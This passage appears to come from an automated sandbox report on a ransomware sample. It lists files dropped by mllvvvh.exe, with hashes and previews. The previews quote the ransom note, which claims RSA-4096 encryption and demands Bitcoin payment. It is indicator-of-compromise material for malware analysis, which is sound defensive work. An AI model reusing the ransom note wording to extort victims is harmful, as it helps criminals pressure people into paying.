                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Spectrum\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Spectrum\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Speech_OneCore\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Speech_OneCore\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Speech_OneCore\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Storage Health\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Storage Health\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Storage Health\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\UEV\InboxTemplates\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\UEV\InboxTemplates\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\UEV\InboxTemplates\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\UEV\Scripts\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\UEV\Scripts\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\UEV\Scripts\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\UEV\Templates\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\UEV\Templates\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\UEV\Templates\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\UEV\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
